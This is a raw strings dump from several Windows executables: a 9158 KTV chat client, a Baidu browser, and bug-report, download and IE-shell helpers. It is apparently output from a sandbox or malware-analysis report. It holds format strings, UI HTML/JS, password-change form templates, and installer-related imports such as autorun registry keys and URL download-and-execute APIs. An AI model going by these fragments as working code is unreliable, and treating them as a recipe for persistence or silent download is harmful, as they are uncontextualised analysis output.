useridx=%s&userpass=%s&type=4&oldbankpass=%s&newbankpass=%s
%s?user=%s&userid=%s
%s&r=%d
CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\
CLSID\%s\InprocServer32
SkinRes\shield.bmp
\sndvol.exe
\sndvol32.exe
hXXp://room.9158.com/in_user_roomin.aspx?roomid=100000
VolumeDB:%d, Pole:%d
//91KboxVCamSetup.exe
//9158VCamSetup.exe
//91KboxVCamSetup.exe
91KboxVCamSetup.exe
//9158VCamSetup.exe
9158VCamSetup.exe
C:\2.txt
%s//in_userchange.aspx?%s
in_userchange.aspx
useridx=%s&type=1
in_userchange_new.aspx
type=2&useridx=%s&name=%s&sex=%s&birthday=%s&province=%s&city=%s
type=2&useridx=%s&oldpass=%s&newpass=%s
PersonalSetting_MSG
%sMultiChatGuest.dll
Host not found: %s
%s - WSAError: %ld
ip=%s&nType=%s&insert=%s&idx=%s&ID=%s&promoid=%s&sType=%s&Version=2
EnterTURL
skinres\WaitRoom.gif
\SkinRes\ServerInfo.bmp
useridx=%s&userpass=%s&type=3&bankcash=%d&sepwd=%s
worldbrocast.xml
RankMsgOkBtn
active/affiche/affiche_ktv.aspx
roomgame/get_gameinfo.aspx
hXXp://cugame.9158.com/active/roomapply/apply.aspx
useridx=%s&userpass=%s&type=2&bankcash=%d
SkinRes\Hall\search_text_bg.bmp
SkinRes\Hall\return.bmp
active/roomsearch/im_search_k.aspx
searchstr=%s&useridx=%s
%s%s%s
!%d/%d
<head><style type='text/css'>.photo img { border:none; }
.photo { position:relative; width:540px; height:650px; margin:0px auto; }
.photo .img, .photo .prev, .photo .next, .photo .down, .photo .share_t,
.photo .share_qzone, .photo .share_weibo { position:absolute; z-index:1; }
.photo .img { left:30px; top:0px; width:480px; height:640px; overflow:hidden; }
.photo .img .img_in { display:table; width:480px; height:640px; }
.photo .img p { display:table-cell; vertical-align:middle; text-align:center; *display:block; *font-size:558px; *font-family:Arial; }
.photo .img img { vertical-align:middle; max-height:640px; max-width:480px; }
* html .photo .img img {
_width: expression(this.offsetWidth > 480 ? '480px': true); }
.photo .prev, .photo .prev:hover,
.photo .next, .photo .next:hover { z-index:3; top:264px; display:block; width:82px; height:82px; cursor:pointer; cursor:hand; }
.photo .prev { left:10px; }
.photo .prev:hover { }
.photo .next { right:10px; _left:445px; }
.photo .next:hover { }
.photo .down,
.photo .down:hover,
.photo .share_t,
.photo .share_t:hover,
.photo .share_qzone,
.photo .share_qzone:hover,
.photo .share_weibo,
.photo .share_weibo:hover { top:560px; z-index:3; display:block; width:64px; height:60px; cursor:pointer; cursor:hand; }
.photo .down { left:350px; }
.photo .down:hover { }
.photo .share_t { left:120px; }
.photo .share_t:hover { }
.photo .share_qzone { left:180px; }
.photo .share_qzone:hover { }
.photo .share_weibo { left:240px; }
.photo .share_weibo:hover { }
<script type='text/javascript'>window.onerror=function(){return true;}; var m_total=0; var nowpos=-1; var Astr
function UrlEncode(s) { var hex=''; var i,j,t; j=0; for (i=0; i<s.length; i  ) { t = hexfromdec( s.charCodeAt(i) ); if (t=='25') { t=''; } hex  = '%'   t; } return hex; } function hexfromdec(num) { if (num > 65535) { return ('err!') } first = Math.round(num/4096 - .5); temp1 = num - first * 4096; second = Math.round(temp1/256 -.5); temp2 = temp1 - second * 256; third = Math.round(temp2/16 - .5); fourth = temp2 - third * 16; return (getletter(third) getletter(fourth)); } function getletter(num) { if (num < 10) { return num; } else { if (num == 10) { return 'A'; } if (num == 11) { return 'B'; } if (num == 12) { return 'C'; } if (num == 13) { return 'D'; } if (num == 14) { return 'E'; } if (num == 15) { return 'F'; } } }
document.getElementById('showimg').src = Astr[nowpos];
function downit(){ window.external.downloadpic(Astr[nowpos]);} function linkit(t){ if(t==1) { window.open('hXXp://share.v.t.qq.com/index.php?c=share&a=index&title=
&url=hXXp://VVV.9158.com&appkey=ce15e084124446b9a612a5c29f82f080&site=VVV.9158.com&pic=' Astr2[nowpos]); } if(t==2) { window.open('hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=' Astr2[nowpos] '&title=
&summary=&pics=' Astr2[nowpos]); } if(t==3) { window.open('hXXp://service.weibo.com/share/share.php?title=
&url=hXXp://VVV.9158.com&source=bookmark&appkey=2992571369&ralateUid=&pic=' Astr2[nowpos]); } }
var arVersion = navigator.appVersion.split('MSIE');
if ((version >= 5.5) && (version < 7) && (document.body.filters))
var imgID = (myImage.id) ? "id='"   myImage.id   "' " : "";
var imgClass = (myImage.className) ? "class='"   myImage.className   "' " : "";
var imgTitle = (myImage.title) ? "title='"   myImage.title   "' " : "title='"   myImage.alt   "'";
var imgStyle = "display:inline-block;"   myImage.style.cssText;
var strNewHTML = "<span "   imgID   imgClass   imgTitle   " style='"   "width:"   myImage.width   "px; height:"   myImage.height   "px;"   imgStyle   ";"   "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader"   "(src='"   myImage.src   "', sizingMethod='scale');'></span>";
myImage.outerHTML = strNewHTML;
window.onload=function(){
<a href='#prev' onmouseover='javascript:prev.src="#path#prev2.png"' onmouseout='javascript:prev.src="#path#prev.png"' onclick='javascript:imgchange(0)' class='prev' title='
'><img id='prev' src='#path#prev.png' onload='fixPNG(this)' /></a>
<a href='#next' onmouseover='javascript:next.src="#path#next2.png"' onmouseout='javascript:next.src="#path#next.png"' onclick='javascript:imgchange(1)' class='next' title='
'><img id='next' class='img_png' src='#path#next.png' onload='fixPNG(this)' /></a>
<a href='#down' onclick='downit()' ondblclick='' onmouseover='javascript:down.src="#path#down2.png"' onmouseout='javascript:down.src="#path#down1.png"' class='down' title='
'><img id='down' class='img_png' src='#path#down1.png' onload='fixPNG(this)' /></a>
<a href='#share_t' onclick='linkit(1);' onmouseover='javascript:share_t.src="#path#share_t2.png"' onmouseout='javascript:share_t.src="#path#share_t1.png"' class='share_t' title='
'><img id='share_t' class='img_png' src='#path#share_t1.png' onload='fixPNG(this)' /></a>
<a href='#share_qzone' onclick='linkit(2);' onmouseover='javascript:share_qzone.src="#path#share_qzone2.png"' onmouseout='javascript:share_qzone.src="#path#share_qzone1.png"' class='share_qzone' title='
'><img id='share_qzone' class='img_png' src='#path#share_qzone1.png' onload='fixPNG(this)' /></a>
<a href='#share_weibo' onclick='linkit(3);' onmouseover='javascript:share_weibo.src="#path#share_weibo2.png"' onmouseout='javascript:share_weibo.src="#path#share_weibo1.png"' class='share_weibo' title='
'><img id='share_weibo' class='img_png' src='#path#share_weibo1.png' onload='fixPNG(this)' /></a></div>
nowpos=%d;imgchange(1);</script>
Astr[m_total]='%s'; Astr2[m_total]='%s'; m_total  ;
SkinRes/GiftBox.bmp
SkinRes\getmoney.bmp
SkinRes\buttonclose.bmp
Button%d
%s List of controls follows:
%s Number of controls: %lu
%s Number of channels: %lu
%s Number of source lines associated with destination line: %lu
%s Manufacturer and product IDs: %u -- %u (see mmreg.h or help subject: "Manufacturer and Product Identifiers")
%s Target name: %s
%s Target type: %lu --
%s Audio line is active. signal is probably passing through the line.
%s Audio line is disconnected.
%s Audio line is an audio source line associated with a single audio destination line.
%s Short Name: %s
%s Name: %s
%s Audio line is a source originating from the waveform-audio output digital-to-analog converter (DAC).
%s MIXERLINE_COMPONENTTYPE_SRC_WAVEOUT
%s Audio line is a source originating from an incoming telephone line.
%s MIXERLINE_COMPONENTTYPE_SRC_TELEPHONE
%s Audio line is a source originating from the output of an internal synthesizer.
%s MIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER
%s Audio line is a source originating from personal computer speaker.
%s MIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER
%s Audio line is a microphone recording source.
%s MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE
%s Audio line is a line-level source (for example, line-level input from an external stereo).
%s MIXERLINE_COMPONENTTYPE_SRC_LINE
%s Audio line is a digital source (for example, digital output from a DAT or audio CD).
%s MIXERLINE_COMPONENTTYPE_SRC_DIGITAL
%s Audio line is a source originating from the output of an internal audio CD.
%s MIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC
%s Audio line is a source originating from the auxiliary audio line.
%s MIXERLINE_COMPONENTTYPE_SRC_AUXILIARY
%s Audio line is an analog source (for example, analog output from a video-cassette tape).
%s MIXERLINE_COMPONENTTYPE_SRC_ANALOG
%s Audio line is a source that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_SRC_UNDEFINED
%s Audio line is a destination that will be the final recording source for voice input.
%s MIXERLINE_COMPONENTTYPE_DST_VOICEIN
%s Audio line is a destination that will be the final recording source for the waveform-audio input (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_WAVEIN
%s Audio line is a destination that will be routed to a telephone line.
%s MIXERLINE_COMPONENTTYPE_DST_TELEPHONE
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive headphones.
%s MIXERLINE_COMPONENTTYPE_DST_HEADPHONES
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive speakers.
%s MIXERLINE_COMPONENTTYPE_DST_SPEAKERS
%s Audio line is a destination used for a monitor.
%s MIXERLINE_COMPONENTTYPE_DST_MONITOR
%s Audio line is a line level destination that will be the final recording source for the analog-to-digital converter (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_LINE
%s Audio line is a destination that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_DST_UNDEFINED
%s Audio line is a digital destination (for example, digital input to a DAT or CD audio device).
%s MIXERLINE_COMPONENTTYPE_DST_DIGITAL
%s Line type :
%s -----------------------------------------------------------------------
%s Name: %d
%s -------------- Item %d -------------
%s Number of items per channel: %d
%s - Multiple control. The control has two or more possible settings.
%s - Control is disabled
%s - Uniform control
%s Status and support flags:
%s - Steps: %lu
%s - Max: %lu
%s - Min: %lu
%s - Max: %ld
%s - Min: %ld
%s Custom control
%s Name: %s
%s Short Name: %s
%s -----------------------------------------------------------------
%s Control type:
%s ---------------------------- Control ----------------------------
== Source line. Index = %d ===========================================================
** Destination line. Index = %d *******************************************************************
You will pass these to the Init() functions of the various CMixerBase-derived classes
Number of destination lines: %d
Name of device: %s
..............nVolume:%d
dBFS..............%d,%d
%Y/%m/%d/%H:%M:%S
------UrlAnalyzeEdit---Error---
<a target='_blank' href='%s'>%s</a>
\9158.exe
%d/%d(
SkinRes\X.bmp
useridx=%s&userpass=%s&type=5&sepwd=%s
<script>window.onerror=function(){return true;};function isSecurity(v){var sinfo;if (v.length < 3) { return 0;} var lv = -1; if (v.match(/[a-z]/ig)){lv  ;} if (v.match(/[0-9]/ig)){lv  ;} if (v.match(/(.[^a-z0-9])/ig)){lv  ;} if (v.length < 6 && lv > 0){lv--;}switch (lv) {case 0:sinfo='<font color=red>
</font>';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');</script><style>body{margin:0px; padding:0px;overflow-x:hidden;overflow-y:hidden;word-break:break-all;background:#d5eaff;}td{padding-right:5px;height:15px;font-size:12px;color:#666666}a{color: #0b66c2; text-decoration:none;};a:hover{color: #0b66c2; text-decoration:underline;};</style><body>
SkinRes\X2.bmp
hXXp://roommanage.9158.com/active/usersearch_k/get_bindinfo.aspx?idx=
<table onMouseOver='window.external.OnKillTimer(0)' onMouseOut='window.external.OnSetTimer(0)' width='100%%' height='100%%' border='0' cellpadding='0' cellspacing='0' align=center><tr><td bgcolor=#c8e3ff width=84 align=right>
:</td><td width=15> </td><td width=90>%s</td><td></td></tr><tr><td bgcolor=#c8e3ff align=right>
:</td><td></td><td colspan=2>%s</td></tr><tr><td bgcolor=#c8e3ff align=right>
:</td><td></td><td id=passqd name=passqd style='color:red'></td><td><a href='%s' align=left target=_blank>
:</td><td></td><td>%s</td><td><a href='%s' align=left target=_blank>
:</td><td></td><td style='color:gray'>%s</td><td><a href='%s' align=left target=_blank>
</font>';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');</script><style>body{margin:5px; padding:0px;overflow-x:hidden;overflow-y:hidden;word-break:break-all;background:white;}td{height:19px;font-size:12px;color:#666666}a{color: blue; text-decoration:underline;};</style><body>
SkinRes/userlogininfo.png
lastlogin:
%sid=%s&idx=%s
SkinRes\HeadInfo\set.bmp
SkinRes\HeadInfo\bind.bmp
SkinRes\HeadInfo\close.bmp
UserInfoDlg_password2
<body style="overflow:scroll;overflow-x:hidden;overflow-y:hidden;margin:0;background:url('
SkinRes\ie_bg.png
SkinRes\Notifybutton.bmp'
%s&userid=%s&type=%s
{47B2178B-6E4A-49B4-9860-9B1836990CA9}
{6C9A41B3-ABB2-45F7-B591-93456A6FCD20}
{0CFC0B7A-7907-49FD-B181-1B8B3955DB74}
skinres\WarehouseBG.bmp
CWebBrowser2
/**%nick/**
hXXp://room.9158.com/dance_room_new/logpay/silver_help.aspx
SkinRes/BackgroundRB.bmp
SkinRes/BackgroundLB.bmp
SkinRes/BackgroundRT.bmp
SkinRes/BackgroundLT.bmp
KX......GetInputDeviceName...return false
KX......GetInputDeviceName...%s
KX......GetInputDeviceName...2
KX......GetInputDeviceName...1
sound\Blip.wav
KX......GetOutputDeviceName...return false
KX......GetOutputDeviceName...%s
KX......InitSubDlg...m_dlgYsq
KX......InitSubDlg...m_dlgMkf
00000000000000000001
d:\Program Files\9158KTV\9158.RPT
!"#$%&'()* ,-./0123456789:;<=>?
#':<@%' 
!%(.FHL
___???***666
(Y%C|B^
*X.Gv<S
*`.Gz
.X7Kw.Dx*<n$4e%8k7Kv4K{@V
(W.CuC^
*&)@??%$*
'L":a.Ds 8f.?l0:^
D%3[.Dp
1&-T.Bg
,Y.Cr,@n*?h6N{[o
version="1.0.0.0"
name="9158.exe.manifest"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
!"#$%&'()* ,
{8856F961-340A-11D0-A96B-00C04FD705A2}
2014-4-4 10
(192.168.1.44)
6, 9, 3, 0
Login
Windows

Baidu.exe_324:

.text
`.rdata
@.data
.rsrc
@.reloc
Base.dll
Utils.dll
WS2_32.dll
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
unsupported version
asio.misc
asio.misc error
thread.entry_event
thread.exit_event
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/IPCMessager.h
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/ChildProcess.h
CChildProcess::HandleMsg() invalid message id.
Base::Process::CChildProcess::HandleMsg
BrowserProcess.cpp
NeedInstallNewVersion:%d
DecodeMsgContent() serialization error
DecodeMsgContent
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/IPCMessageDef.h
E:\MiniBaidu\minibaidu_stable_proj\Include\boost/exception/detail/exception_ptr.hpp
EncodeMsgContent() serialization error
EncodeMsgContent
BrowserShell.cpp
Heartbeat.dll
BDMSkin.dll
Skins\CommonRes.rdb
UIHandler.dll
BrowserFrame.dll
C:\Windows\System32\riched20.dll
e:\minibaidu\minibaidu_client_proj\source\brbrowser\AppPrefetcher.h
open file error: %x
BrowserShellMain.cpp
CommonWorkerProcess.cpp
CCommonWorkerProcess::HandleMsg Fail to handle %d message.
CCommonWorkerProcess::HandleMsg
CCommonWorkerProcess::GetInstance Fail to get %d instance
Report %d data
CCommonWorkerProcess::HandleReportJob
CCommonWorkerProcess::HandleReportJob Fail to handle %d message
GetReportMgr
ReleaseReportMgr
CCommonWorkerProcess::HandleProtocolJob Fail to handle %d message
boost thread: trying joining itself
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/AsyncTask.h
PluginMgrProcess.cpp
RendererProcess.cpp
E:\MiniBaidu\Basic\Output\BinRelease\Baidu.pdb
?QueryKeyValue@Register@Base@@YAHPAUHKEY__@@PB_W1PA_WPAK@Z
Report.dll
MSVCP100.dll
MSVCR100.dll
_amsg_exit
_acmdln
_crt_debugger_hook
GetProcessHeap
CreateIoCompletionPort
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ole32.dll
ShellExecuteW
SHELL32.dll
SHLWAPI.dll
WINMM.dll
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@
.?AV?$oserializer@Vbinary_oarchive@archive@boost@@USRunDone@ControlMsg@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vbinary_oarchive@archive@boost@@USRunDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$oserializer@Vbinary_oarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vbinary_oarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$bind_t@_NV?$mf1@_NVCChildProcess@Process@Base@@ABUSIPCMsg@IPCMessager@3@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCChildProcess@Process@Base@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AUSLaunchDone@ControlMsg@@
.?AUSRunDone@ControlMsg@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USHostLoginNotification@CommonServiceMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USHostDoReport@CommonServiceMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USHostLoginNotification@CommonServiceMsg@@@detail@archive@boost@@
.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USHostDoReport@CommonServiceMsg@@@detail@archive@boost@@
.?AV?$bind_t@XV?$mf1@XVCCommonWorkerProcess@@ABUSIPCMsg@IPCMessager@Base@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCCommonWorkerProcess@@@boost@@@_bi@boost@@V?$value@USIPCMsg@IPCMessager@Base@@@23@@_bi@3@@_bi@boost@@
.?AUSHostDoReport@CommonServiceMsg@@
.?AUSHostLoginNotification@CommonServiceMsg@@
%uuqb
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
?"?4?;?|?
;%;*;2;{;
5T5C5R5a5p5
= =$=(=,=0=4=8=<=@=
9 9@9`9|9
3 3$3(3,30343<3@3
A8706990-9490-4106-8033-12E64714B86B
Protocol.dll
CHROMECORE_PROCESS
\WebkitEngine.dll
\TridentEngine.dll
chrome-extension
login
url-safe
res://LocalPages.dll/
.html
.br.baidu.com
.bdl.brs
--default-chromecore-path=
--disable-chromecore
Reply msg to parent
Start hearbeat and send heartbeat msg.
password
C1BB4C06-D91C-47D8-B28E-E76B943205E9
user32.dll
\LogicMisc.dll
\UIHandler.dll
Upd.dat
BaiduUpdate.exe
\BrowserFrame.dll
\Heartbeat.dll
%ws\Utils.dll
%ws\Base.dll
Leave PrefetchData:readFile error code=%d
Enter Base::MemoryOptimizer::Instance().Start()
Leave Base::MemoryOptimizer::Instance().Start()
Baidu.exe
@\CommonWorker.dll
Failed in init CommonWorker.dll instance.
pCCommonWorkerProcess::Run installationTask = %s
CCommonWorkerProcess::Run customid = %d shmoffset = %d
CCommonWorkerProcess::HandleInstallationTask() strTaskType=%s strTaskParam=%s
BaiduBugRpt.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
uninst.exe
HandleSCNotifyTask ItemID = %d shmoffset = %d
HandleSCNotifyTask wszSrcFileName = %s
HandleSCNotifyTask monitorid = %d
HandleSCNotifyTask eventType = %d
ShellExecute result = %d
sBDClientProxy.dll
Software\Microsoft\Windows\CurrentVersion\Run
ClientRegAddValueToList result = %d
nClientRegSetValueEx result = %d
GetDefenseSwitch value = %s
GetDefenseSwitch Read Reg failed! err = %d
\PluginMgr.dll
p\BrowserCore.dll
1.6.200.359

BugReport.exe_3248:

.text
`.rdata
@.data
.rsrc
<4,$?7/'
(3-!0,1'8"5.*2$
?SetSkinPath@CAppSysOperation@@SAXVCString@@@Z
MVUILib.dll
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
WS2_32.dll
SHLWAPI.dll
BugReport.exe
SkinRes\99Lover.xml
Software\9158web
m_cbLeftToSend=%d
9158.RPT
cbLeftToSend:%d
SkinRes\Sure.bmp
SkinRes\buttonclose.bmp
SkinRes\rightBackground.bmp
SkinRes\leftBackground.bmp
SkinRes\BackgroundRB.bmp
SkinRes\BackgroundLB.bmp
SkinRes\BackgroundRT.bmp
SkinRes\BackgroundLT.bmp
BugURL
client.xml
SOFTWARE\Microsoft\Windows NT\CurrentVersion
BugReport
BugReport 1.0
BugReport Microsoft
1, 0, 0, 1
BugReport
BugReport.EXE
BugReport
BugReport(&A)...

DownLoad.exe_3484:

.text
`.rdata
@.data
.rsrc
SSh$@A
MFC42.DLL
MSVCRT.dll
_acmdln
GetWindowsDirectoryA
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteExA
ShellExecuteA
SHELL32.dll
COMCTL32.dll
URLDownloadToFileA
urlmon.dll
SHLWAPI.dll
WS2_32.dll
DDVEC.dll
DDVCtrlLib.dll
WININET.dll
\Download.log
111111111111112222
urlwebasp
urlweb
.PAVCInternetException@@
Content-Type: application/x-www-form-urlencoded
%d,time :%d
OnTimer:%d
(%s, V%s)
dlgconfig.ini
\DlgMin_N.bmp
\DlgClose_N.bmp
DownTitle.bmp
BtnBack_N.bmp
DlgBack_N.bmp
%s\skinres\buttons\
ID:%d, Status:%d, cmdLine:%s,
%dkb/s
AddMission MISSION_STYLE_NONE11 gameid:%d
AddMission end gameid:%d
svrInx:%d, svrIP:%s, svrPort:%d, lv:%d, luv:%d, rv:%d, ruv:%d
AddMission lpTask->GetFileID()==0 gameid:%d
AddMission pOldTask22 gameid:%d
AddMission pOldTask11 gameid:%d
hXXp://%s/%s
AddMission MISSION_STYLE_NONE gameid:%d
%s\download\%s%d
AddMission GetRemoteFileInfo gameid:%d
AddMission leave gameid:%d
AddMission GetRemoteServerInfo gameid:%d
AddMission MISSION_STYLE_SETUP gameid:%d
gameid:%d
AddMission gameid:%d
port
DIRSERVER%d
\Download\DownSvrList.ini
\Download\testSvr.ini
GAME_%d
softlistinfor.ini
%d.%d
%s\download\softlistinfor%d.ini
\lobby.ini
%d********
%s.tmp
%s\DownLoad\%s
%s/%s
DownSvrList.ini
webpath
webpath2
_Setup.exe
(DownloadFileFromWeb)
http_DX
http_WT
%sVersionInfo/default.htm
%sVersionInfo/%s_V%s.htm
\download.ini
\skinres\titlebg.bmp
pass %s
user %s
size %s
XCRC %s
retr %s
rest %d
**** openfile:pasv command fail, code:%d
:%s, %d
%d, Offset:%d, size:%d
ID:%d, Index:%d
%s,%s
11111111111111
.tmp.tg
.PAVCFileException@@
%s Inx:%d Offset:%d Len:%d
****ERR:%d,
nInx:%d, offset:%d, siz:%d
****Err:%d,
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP/1.1
\winhlp32.exe
Unknown Error (%d) occurred.
There was not enough memory to complete the operation.
The operating system denied
The .EXE file is invalid
(non-Win32 .EXE or error in .EXE image).
The operating system is out
\ProgressFore.bmp
\ProgressBack.bmp
CWebBrowser2
Flags:X
DS:X ES:X FS:X GS:X
SS:ESP:X:X EBP:X
CS:EIP:X:X
EAX:X
EBX:X
ECX:X
EDX:X
ESI:X
EDI:X
Fault address: X X:X %s
Exception code: X %s
//== Error Time[%s] =================================================
%Y-%m-%d,%H:%M:%S
NTDLL.DLL
FLT_INVALID_OPERATION
FLT_DENORMAL_OPERAND
X X X:X %s
wd:\Program Files\9158KTV\DownLoad.RPT
ÍE:FG/
77‰:;<=&
(1>?* 34@
'(12**334
version="1.0.0.0"
name="9158.exe.manifest"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
{8856F961-340A-11D0-A96B-00C04FD705A2}
10, 3, 19, 1
DownLoad.EXE
1, 0, 0, 1

9158IE.exe_2864:

.text
`.rdata
@.data
.rsrc
j SSSSSSSh
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
MSVCP60.dll
WINMM.dll
?SetJpegQuality@CxImage@@QAEXE@Z
publictool.dll
9158IE.exe
public.dll
NetworkOpt.dll
DEBUG:%s,%d
%d|%d|%d|%d|%d|%d|%d|%d|%d|%d|
MixerXP.dll FAILED
MixerXP.dll
SOFTWARE\9158web
wwww nUseridx:%d
AVUI.dll
%s|%d
<style> .topNav {display:none; width: 100%; z-index: 100; overflow: visible; position: fixed; bottom: 0px; _position: absolute; _top: expression(documentElement.scrollBottom   0   'px'); background-color:#fff7de; height: 30px; }</style>
<script>function Fbottomshow(str) { document.getElementById ('bottomshow').style.display = 'block'; document.getElementById ('bottomshow').innerHTML = str; }</script>
<script>var bScrollState=-1,nType=0; window.onscroll = function(){
{ if(bScrollState!=0) { window.external.ScrollBtnSet(nType,1); } bScrollState=0; } else
{ if(bScrollState!=1) { window.external.ScrollBtnSet(nType,0); } bScrollState=1; } };</script>
<script>var bScrollState=-1,nType=1; window.onscroll = function(){
<script>var bScrollState=-1,nType=9; window.onscroll = function(){
if(document.body){
bodyScrollTop = document.body.scrollTop;
if(document.documentElement){
documentScrollTop = document.documentElement.scrollTop;
bodyScrollHeight = document.body.scrollHeight;
documentScrollHeight = document.documentElement.scrollHeight;
if(document.compatMode == 'CSS1Compat'){
windowHeight = document.documentElement.clientHeight;
windowHeight = document.body.clientHeight;
<style>.fixed{ position:fixed;top:0px;left:0px;z-index:999;height:74px;overflow:hidden} .ie6{ _position:absolute; _margin-top: 0; _top:expression(documentElement.scrollTop)} .c1{text-decoration:none;height:24px;background:#ffc1c1; border:1px solid #f4a8a8;} .c2{cursor:hand;text-decoration:none;float:left;font-size:12px;width:182px; overflow:hidden; white-space:nowrap;color:#392729; height:24px; line-height:24px;vertical-align:middle;padding-left:5px} .c3{cursor:hand;font-size:14px;float:right;width:16px;height:16px;padding:4px 5px 0 0;} </style><div class='fixed ie6' id='fixit' name='fixit'></div> <script type='text/javascript'> function intval(v){ v = parseInt(v); return isNaN(v) ? 0 : v; } function getPos(e){ var l = 0; var t = 0; var w = intval(e.style.width); var h = intval(e.style.height); var wb = e.offsetWidth; var hb = e.offsetHeight; while (e.offsetParent) { l  = e.offsetLeft   (e.currentStyle ? intval(e.currentStyle.borderLeftWidth) : 0); t  = e.offsetTop   (e.currentStyle ? intval(e.currentStyle.borderTopWidth) : 0); e = e.offsetParent; } l  = e.offsetLeft   (e.currentStyle ? intval(e.currentStyle.borderLeftWidth) : 0); t  = e.offsetTop   (e.currentStyle ? intval(e.currentStyle.borderTopWidth) : 0); return { x: l, y: t, w: w, h: h, wb: wb, hb: hb }; } function getScroll(){ var t, l, w, h; if (document.documentElement && document.documentElement.scrollTop) { t = document.documentElement.scrollTop; l = document.documentElement.scrollLeft; w = document.documentElement.scrollWidth; h = document.documentElement.scrollHeight; } else if (document.body) { t = document.body.scrollTop; l = document.body.scrollLeft; w = document.body.scrollWidth; h = document.body.scrollHeight; } return { t: t, l: l, w: w, h: h }; } function scroller(el, duration){ if (typeof el != 'object') { el = document.getElementById(el); } if (!el) return; var z = this; z.el = el; z.p = getPos(el); z.s = getScroll(); z.clear = function(){ window.clearInterval(z.timer); z.timer = null }; z.t = (new Date).getTime(); z.step = function(){ var t = (new Date).getTime(); var p = (t - z.t) / duration; if (t >= duration   z.t) { z.clear(); window.setTimeout(function(){ z.scroll(z.p.y, z.p.x) }, 13); } else { st = ((-Math.cos(p * Math.PI) / 2)   0.5) * (z.p.y - z.s.t)   z.s.t; sl = ((-Math.cos(p * Math.PI) / 2)   0.5) * (z.p.x - z.s.l)   z.s.l; z.scroll(st, sl); } }; z.scroll = 